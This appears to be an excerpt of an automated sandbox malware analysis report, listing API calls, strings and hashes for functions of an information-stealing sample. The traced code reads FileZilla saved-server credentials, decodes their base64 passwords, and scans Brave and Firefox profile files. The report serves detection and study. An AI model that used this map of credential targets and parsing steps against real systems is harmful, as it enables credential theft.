                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: f34d08cd0acdcedb12c6f1d2a6dd5edc845b69d773013f5818b39c2a039f416b
                                • Instruction ID: fc62fc46cfd67d36e6c99f982668f6fe335c8860452253b1c2c56b76d28c712d
                                • Opcode Fuzzy Hash: f34d08cd0acdcedb12c6f1d2a6dd5edc845b69d773013f5818b39c2a039f416b
                                • Instruction Fuzzy Hash: A562D331D10616ABCB31AF78E849AAE77F9AF44349F44A528FD45B3240DB34DD09CBA0
                                Function 00E56960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E569C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E56A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E56A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E56AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E56B35
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56B9D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 35aeb8bb02219b605dec28eb694806cabc13e9db079e8aa6e66aaa849c50993d
                                • Instruction ID: 9c807b782799c9feaa7a3a96d8de61a69d461802c163a68d727a3c6a0d525ad4
                                • Opcode Fuzzy Hash: 35aeb8bb02219b605dec28eb694806cabc13e9db079e8aa6e66aaa849c50993d
                                • Instruction Fuzzy Hash: 9342D170E10205ABCB21ABB4EC49A6E7BB9AF44319F44A828FE45F7241DB34DD058B60
                                Function 00E4DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DBEF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E4DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC17
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E4DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC4C
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DC8F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4DCD0
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E4DCF0
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E4DD0A
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E4DD1D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DD7B
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDA3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DDAF
                                • lstrlen.KERNEL32(?), ref: 00E4DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DE19
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DE6F
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DE7B
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DEBB
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DEE6
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DEF2
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFA5
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DFB1
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DFF4
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E022
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4E02E
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00E4E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E4E0E7
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E11F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E19F
                                • lstrcat.KERNEL32(00000000), ref: 00E4E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E4E1F9
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E22F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E4E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E261
                                • lstrcat.KERNEL32(00000000,016C88F8), ref: 00E4E269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E4E988
                                • FindClose.KERNEL32(00000000), ref: 00E4E997
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: f6a55c38e8e9ad7ff99a4ece14fd9e88681d10e1561f8d0de11b5339f57d67d8
                                • Instruction ID: 2f64a5b5f14b182bad2bd9b0032ac7d6abdc49f3029b44d7b115ad84f802d79b
                                • Opcode Fuzzy Hash: f6a55c38e8e9ad7ff99a4ece14fd9e88681d10e1561f8d0de11b5339f57d67d8
                                • Instruction Fuzzy Hash: BE526E71E112069BCB21EF78EC89AAE77F9AF44308F44A528F945B7345DB34DD058BA0
                                Function 00E460D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E460FF
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46152
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46185
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E461B5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E461F0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E46233
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 56f74d336edd3a1493f1e6764aa81c0c2f8f0ec49d84150dd6f2a6eeb102cc43
                                • Instruction ID: b1d136fc5aaae4a7534939ab3a259b19afd14755360fb8716ba345fe9991aa19
                                • Opcode Fuzzy Hash: 56f74d336edd3a1493f1e6764aa81c0c2f8f0ec49d84150dd6f2a6eeb102cc43
                                • Instruction Fuzzy Hash: E3527C71E10215ABCB21EFA4FC49AAE77F9AF45358F14A428F945F7241DB34EC018BA1
                                Function 00E56B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56B9D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56BCD
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56BFD
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00E56C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E56C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E56C5A
                                • lstrlen.KERNEL32(00000000), ref: 00E56C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E56CE2
                                • lstrlen.KERNEL32(00000000), ref: 00E56CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00E56D6A
                                • lstrlen.KERNEL32(00000000), ref: 00E56D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E56DF2
                                • lstrlen.KERNEL32(00000000), ref: 00E56E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E56E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E56EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E56EC9
                                • LocalFree.KERNEL32(00000000), ref: 00E56ED4
                                • lstrlen.KERNEL32(?), ref: 00E56F6E
                                • lstrlen.KERNEL32(?), ref: 00E56F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 897a11266f1c2fb884e94b211494dfb5634b393935556747fa6af09191a2a926
                                • Instruction ID: 10e982bce3ab81842b71be038169cde1214f80432982037aed039664fb739e30
                                • Opcode Fuzzy Hash: 897a11266f1c2fb884e94b211494dfb5634b393935556747fa6af09191a2a926
                                • Instruction Fuzzy Hash: D202A370E11205AFCB21ABB4EC49A6E7BB9AF04719F546818FE85F7341DB34DD058B60
                                Function 00E54B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54B7F
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E54B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BA7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E54BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E54BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: f7d3f28af8621cd5fca10aaa2877b430ce8a61c33001b6b778fc5c3e7c7fd7db
                                • Instruction ID: e3c0868cb1c385e58b48942f3dc3b9c74cfb03696f7d9891b214c786e3456040
                                • Opcode Fuzzy Hash: f7d3f28af8621cd5fca10aaa2877b430ce8a61c33001b6b778fc5c3e7c7fd7db
                                • Instruction Fuzzy Hash: 2392AE71A016018FCB24CF28D458B6AB7F5AF4431AF18D4ADEC49AB3A5D736DC86CB50
                                Function 00E51250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E51291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E512BF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E512CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512E7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E512F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E5133A
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5135C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E51376
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E513AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E513D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E513E2
                                • lstrlen.KERNEL32(00E71794), ref: 00E513ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5140A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51416
                                • lstrlen.KERNEL32(?), ref: 00E51423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51443
                                • lstrcat.KERNEL32(00000000,?), ref: 00E51451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5147A
                                • StrCmpCA.SHLWAPI(?,016CD8F8), ref: 00E514A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E514E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51535
                                • StrCmpCA.SHLWAPI(?,016CDDB0), ref: 00E51552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E515BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E515E4
                                • StrCmpCA.SHLWAPI(?,016CD7C0), ref: 00E51602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51633
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51685
                                • StrCmpCA.SHLWAPI(?,016CD8B0), ref: 00E516B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E516F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51745
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E517BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E517F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5181C
                                • FindClose.KERNEL32(00000000), ref: 00E5182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
